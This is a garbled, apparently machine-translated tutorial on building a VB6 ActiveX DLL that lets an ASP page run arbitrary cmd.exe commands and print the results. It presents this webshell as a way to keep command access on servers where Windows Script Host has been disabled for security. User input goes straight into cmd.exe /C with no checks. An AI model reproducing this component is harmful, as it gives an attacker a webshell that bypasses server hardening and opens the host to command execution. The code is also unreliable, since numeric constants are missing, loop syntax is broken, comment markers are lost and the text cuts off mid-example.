Sometimes we disable Windows scripting Host for security purposes when managing servers, which prevents some unscrupulous users from using WSH to generate a webshell that poses a significant security risk to the server. But what if we want to disable WSH and want to use our own Webshell for server management? This paper introduces a component program that implements CMD in ASP and displays the result. I hope we can be of some help.
First we create a new Activedll project, named Aspcmd, and the new class is named Cmdshell. Add a reference to "referenct" in "Project": Microsoft Active Server Pages Object Library.
Then our idea is to use the window API ShellExecute to call Cmd.exe, save the running results to a temporary text file, and then read the contents of the file to display.
The following is the code for the class cmdshell.cls of the engineering aspcmd.
Option Explicit
Dim RP as Response
Dim RQ as Request
Dim AP as Application
Dim SR as Server
Dim SN as session
Private Declare Sub sleep Lib "kernel32" (ByVal dwmilliseconds as Long)
Private Declare Function shellexecute Lib "Shell32.dll" Alias "Shellexecutea" (ByVal hWnd as Long, ByVal lpoperation as St Ring, ByVal lpfile As String, ByVal lpparameters as String, ByVal lpdirectory as String, ByVal nShowCmd as long) as long
Private Sub ShellEx (ByVal slocation As String, ByVal Spara as String, Optional maxedform as Boolean = False)
On Error GoTo Errhandle:
Dim LR as Long
Dim Style as Long
Dim HWnd as Long
If Maxedform Then
Style = vbMaximizedFocus
Else
Style = Vbnormalfocus
End If
LR = ShellExecute (hWnd, "open", Slocation, Spara, "", Style)
If (LR < 0) Or (lr >) Then
' Success
Else
Rp. Write "Error occered when starting" & Slocation
End If
Errhandle:
Rp. Write "Error:" & Err.Description
End Sub
Public Sub OnStartPage (ByVal MYSC as ScriptingContext)
Set RP = Mysc. Response
Set RQ = Mysc. Request
Set sr = Mysc. Server
Set ap = Mysc. Application
Set sn = mysc. Session
End Sub
Public Sub OnEndPage ()
Set RP = Nothing
Set RQ = Nothing
Set sr = Nothing
Set ap = Nothing
Set sn = Nothing
End Sub
Private Function fileexists (Filename as String) as Boolean
Dim I as Integer
On Error Resume Next
i = Len (dir$ (Filename))
If Err Or i = 0 Then fileexists = False Else fileexists = True
End Function
Private Function IsOpen (Filename as String) as Boolean
Dim Ffile as Integer
Dim msg as String
Ffile = FreeFile ()
On Error GoTo Erropen
Open Filename for Binary Lock Read Write as Ffile
Close Ffile
Exit Function
Erropen:
If Err.Number <> Then
msg = "Error #" & Str (Err.Number) & "is generated by" _
& Err.Source & Chr (km) & Err.Description
Else
IsOpen = True
End If
End Function
Public Sub EXEC1 (ByVal strcmd as String)
On Error GoTo Errhandle:
Dim MyTimer as Integer
MyTimer = 0
Dim Strout as String
Dim strFName as String
Generate a temporary file
If Len (App.Path) = 3 Then
strFName = App.Path & "Lhtmp.txt"
Else
strFName = App.Path & "\lhtmp.txt"
End If
Delete if the file already exists before the run
If fileexists (strfname) Then
Kill strFName
End If
Run the cmd command for the line user and output the result to a temporary file
Note the/C parameter of the Cmd.exe refers to the end of session state immediately after running a command. is equivalent to the CMD command entered in Windows run.
Dim Strpara as String
Strpara = "/C" & Strcmd & ">" & strFName
ShellEx "cmd.exe", Strpara
Wait for build output file
Do, not fileexists (strFName)
Sleep 1000
DoEvents
MyTimer = MyTimer + 1
If MyTimer = Then
Exit do
End If
Loop
MyTimer = 0
Wait for file output to complete
Do While IsOpen (strFName)
Sleep 1000
DoEvents
MyTimer = MyTimer + 1
If MyTimer = Then
Exit do
End If
Loop
Display the contents of the output file
Open strFName for Input as #1
Do with not EOF (1)
Line Input #1, Strout
Rp. Write Strout & VbCrLf
Loop
Close #1
Sleep 1000
Delete temporary files
Kill strFName
Exit Sub
Errhandle:
Rp. Write "Error occured:" & Err.Description
End Sub
Generate ASPCMD.dll and register components using regsvr32 aspcmd.dll.
The following is an example of an ASP program that invokes the DLL:
<% @LANGUAGE = "VBSCRIPT"%>
<style type=&quo